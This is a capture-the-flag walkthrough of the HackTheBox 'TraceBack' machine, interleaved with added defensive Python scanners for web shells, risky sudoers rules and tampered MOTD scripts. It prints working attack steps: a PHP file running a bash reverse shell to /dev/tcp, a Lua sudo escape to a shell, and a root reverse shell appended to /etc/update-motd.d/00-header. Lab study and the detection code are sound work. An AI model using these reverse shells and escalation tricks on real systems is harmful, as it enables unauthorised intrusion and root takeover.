TraceBack from HackTheBox

The box starts by finding a web shell already present on the server and using it to get a reverse shell. Then we pivot to another user, using Lua, to own user. Finally, by exploiting a cleanup script running as root, we obtain the root shell.

Nmap scan

Usually I start with an nmap scan:

nmap -sV -sC 10.10.10.181 -v
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have ssh and web ports open.

Web enumeration

Checking the website:

It looks like the box has something to do with a web shell.

Running dirbuster didn't return anything useful, so I took a look at the page source:

<body>
	<center>
		<h1>This site has been owned</h1>
		<h2>I have left a backdoor for all the net. FREE INTERNETZZZ</h2>
		<h3> - Xh4H - </h3>
		<!--Some of the best web shells that you might need ;)-->
	</center>
</body>

Xh4H (the box creator) left a hint: "Some of the best web shells that you might need".
Searching for "Xh4H web shells", I found a tweet that led to a list of web shells created by this user.

Trying each one against the box URL, smevk.php worked!
Going to: http://10.10.10.181/smevk.php
It's a login page; the default credentials (admin:admin) let me log in.

Getting first shell

There is a browse option. Since we know PHP is allowed, let's upload a simple PHP reverse shell:

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.81/1234 0>&1'");
?>

Save it as rev.php, browse for it, then click on the >> symbol to upload the shell.
Now rev.php appears in the file manager.

Listen on port 1234 (don't forget to change the IP and port in rev.php):

rlwrap nc -vlp 1234

To execute the reverse shell, just visit http://10.10.10.181/rev.php

And we get a shell back!
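From the defender's side, the interesting part of this step is how little a dropped file like rev.php looks like application code: a handful of command-execution and reverse-shell constructs give it away. The following is an added example, not code from the write-up or from the box, that walks a web root and flags PHP files containing such constructs. The sample web root, its index.php and the rev.php copy are constructed here; on a real host you would point scan_webroot() at /var/www/html.

```python
"""Scan a web root for PHP files carrying command-execution primitives.

Added example, not part of the original write-up: a defender-side check for
files like smevk.php or rev.php. The sample web root and its files are
constructed here; on a real host point scan_webroot() at /var/www/html.
"""
import os
import re
import tempfile

# Constructs a legitimate application rarely needs but web shells almost always use.
SUSPICIOUS = {
    "exec": re.compile(r"\b(?:shell_)?exec\s*\(", re.I),
    "system": re.compile(r"\b(?:system|passthru|popen|proc_open)\s*\(", re.I),
    "eval": re.compile(r"\beval\s*\(", re.I),
    "reverse_shell": re.compile(r"/dev/tcp/|\bbash\s+-i\b"),
    "obfuscation": re.compile(r"\b(?:base64_decode|gzinflate|str_rot13)\s*\(", re.I),
}

PHP_EXTENSIONS = (".php", ".phtml", ".php5", ".phar")


def scan_file(path):
    """Return the sorted list of pattern names that match the file's contents."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return sorted(name for name, rx in SUSPICIOUS.items() if rx.search(text))


def scan_webroot(root):
    """Walk the web root and map each suspicious PHP file (relative path) to its hits."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            hits = scan_file(path)
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings


# Constructed sample web root: the defaced index page and the rev.php from the write-up.
SAMPLE_FILES = {
    "index.php": "<?php echo '<h1>This site has been owned</h1>'; ?>\n",
    "rev.php": "<?php\nexec(\"/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.81/1234 0>&1'\");\n?>\n",
}


def build_sample_webroot():
    """Write the constructed sample files into a temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel, body in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    root = build_sample_webroot()
    for rel, hits in sorted(scan_webroot(root).items()):
        print(f"{rel}: {', '.join(hits)}")
```

The pattern set is deliberately small; it will miss heavily obfuscated shells, which is why a hash baseline of the web root (compare against the deployed release) is the stronger control, with this scan as a quick triage pass.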

Own user

Before doing any work, it's better to upgrade the shell first:

python -c 'import pty;pty.spawn("/bin/bash")'

Enumeration

Searching the home directory of the webadmin user, I found a note.txt:

- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.

It's a message from the sysadmin user; it looks like I can use a tool to execute Lua code.
Running sudo -l reveals that webadmin can execute the luvit binary as sysadmin without a password.

After searching for how to execute system commands from Lua, I found a simple way to do it.

Creating a Lua shell:

echo "local t = os.execute('/bin/sh')" > rev.lua

Now executing the command:

sudo -u sysadmin /home/sysadmin/luvit rev.lua

Got a shell as user sysadmin!
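The lesson for whoever maintains sudoers is that allowing an interpreter such as luvit is the same as allowing a shell: os.execute() is one line away. Below is an added example, not code from the write-up, that parses sudoers-style rules and reports every command that grants arbitrary execution, with NOPASSWD as an aggravating factor. The sudoers text is a constructed sample mirroring the rule shown by sudo -l on the box, and INTERPRETERS is an illustrative subset, not a complete list.

```python
"""Audit sudoers rules for commands that amount to handing out a shell.

Added example, not part of the original write-up. The sudoers text is a
constructed sample mirroring the rule found on the box, and INTERPRETERS is
an illustrative subset of binaries that execute arbitrary code, not a complete list.
"""
import os
import re

# Any of these lets the caller run arbitrary code as the run-as user, so a sudo rule
# naming one is equivalent to "ALL" for that user, whatever the intended purpose.
INTERPRETERS = {
    "sh", "bash", "dash", "zsh", "lua", "luvit", "python", "python2", "python3",
    "perl", "ruby", "node", "php", "vi", "vim",
}

# user host = (runas) [TAG: ...] cmd1, cmd2   (User_Alias/Defaults lines are skipped)
RULE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Return a list of rule dicts: user, host, runas, tags (set), cmds (list)."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE.match(line)
        if not m:
            continue
        rules.append({
            "user": m.group("user"),
            "host": m.group("host"),
            "runas": m.group("runas"),
            "tags": {t.rstrip(":") for t in m.group("tags").split()},
            "cmds": [c.strip() for c in m.group("cmds").split(",") if c.strip()],
        })
    return rules


def audit(rules):
    """Return (user, runas, cmd, reasons) for every command that grants arbitrary execution."""
    findings = []
    for r in rules:
        for cmd in r["cmds"]:
            reasons = []
            if cmd == "ALL":
                reasons.append("any command")
            else:
                binary = os.path.basename(cmd.split()[0])
                if binary in INTERPRETERS:
                    reasons.append(f"{binary} executes arbitrary code")
                if "*" in cmd:
                    reasons.append("wildcard argument")
            if not reasons:
                continue
            if "NOPASSWD" in r["tags"]:
                reasons.append("no password required")
            findings.append((r["user"], r["runas"], cmd, reasons))
    return findings


# Constructed sample; the webadmin line mirrors what sudo -l shows on the box.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root            ALL=(ALL:ALL) ALL
%sudo           ALL=(ALL:ALL) ALL
webadmin        ALL=(sysadmin) NOPASSWD: /home/sysadmin/luvit
backup          ALL=(root) NOPASSWD: /usr/bin/systemctl restart apache2
"""


if __name__ == "__main__":
    for user, runas, cmd, reasons in audit(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"{user} -> {runas}: {cmd}  [{'; '.join(reasons)}]")
```

The root and %sudo entries are reported too, because the audit only states what each rule permits; deciding which of those grants are intended is the reviewer's job. The fix for the webadmin rule is to sudo a wrapper script with fixed arguments rather than the interpreter itself.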

Own root

Enumeration

pspy64 shows a command running as root: every 30 seconds the system copies the files in /var/backups/.update-motd.d/ to /etc/update-motd.d/.
After a while, I noticed that these scripts are executed on every SSH login, and the commands in 00-header run as root.
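Scripts in /etc/update-motd.d run as root on every login, so any user who can write to them, or to the backup directory they are restored from, controls root. A periodic copy does not protect them; only integrity monitoring and tight permissions do. The following is an added example, not code from the write-up, that baselines the SHA-256 of each script in a directory and later reports scripts that changed, appeared, vanished, are writable by group or others, or are not owned by the expected uid. The directory and the 00-header content in demo() are constructed; on a real host the directory would be /etc/update-motd.d (and /var/backups/.update-motd.d) with expected_uid 0.

```python
"""Integrity check for the MOTD scripts that run as root on every SSH login.

Added example, not part of the original write-up. It takes a baseline of
SHA-256 hashes for every script in a directory and later reports scripts that
changed, appeared, vanished, are writable by group/others, or are not owned
by the expected uid. The directory and script used in demo() are constructed;
on a real host the directory would be /etc/update-motd.d and expected_uid 0.
"""
import hashlib
import os
import stat
import tempfile


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def regular_files(directory):
    return sorted(n for n in os.listdir(directory) if os.path.isfile(os.path.join(directory, n)))


def baseline(directory):
    """Map script name -> sha256 for every regular file in the directory."""
    return {name: sha256_file(os.path.join(directory, name)) for name in regular_files(directory)}


def check(directory, known, expected_uid=0):
    """Return {script: [problems]} for every script that deviates from the baseline."""
    problems = {}
    present = regular_files(directory)
    for name in present:
        path = os.path.join(directory, name)
        issues = []
        if name not in known:
            issues.append("not in baseline")
        elif sha256_file(path) != known[name]:
            issues.append("content changed")
        st = os.stat(path)
        if st.st_uid != expected_uid:
            issues.append(f"owned by uid {st.st_uid}, expected {expected_uid}")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            issues.append("writable by group or others")
        if issues:
            problems[name] = issues
    for name in sorted(set(known) - set(present)):
        problems[name] = ["missing"]
    return problems


# Constructed stand-in for a stock 00-header script.
HEADER = '#!/bin/sh\n[ -r /etc/lsb-release ] && . /etc/lsb-release\nprintf "Welcome to %s\\n" "$DISTRIB_DESCRIPTION"\n'


def demo():
    """Baseline a constructed directory, tamper with 00-header, and return both check results."""
    directory = tempfile.mkdtemp(prefix="motd-")
    path = os.path.join(directory, "00-header")
    with open(path, "w") as fh:
        fh.write(HEADER)
    os.chmod(path, 0o755)
    known = baseline(directory)
    clean = check(directory, known, expected_uid=os.getuid())
    # Simulate tampering: an appended line plus group write permission (constructed).
    with open(path, "a") as fh:
        fh.write("echo tampered\n")
    os.chmod(path, 0o775)
    dirty = check(directory, known, expected_uid=os.getuid())
    return clean, dirty


if __name__ == "__main__":
    clean, dirty = demo()
    print("before tampering:", clean or "no findings")
    print("after tampering:", dirty)
```

Run check() from a root cron job (or an existing file-integrity tool) against both the live directory and the backup copy; on this box, monitoring only /etc/update-motd.d would be blind to a change planted in the source directory and restored by the 30-second copy.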

Get a shell as root

I've added a bash reverse shell to 00-header:

echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.81/4444 0>&1'" >> /etc/update-motd.d/00-header

Listening on port 4444 and connecting to the box over SSH from another terminal returned a root shell:

Finally the box is rooted :). Your feedback is appreciated!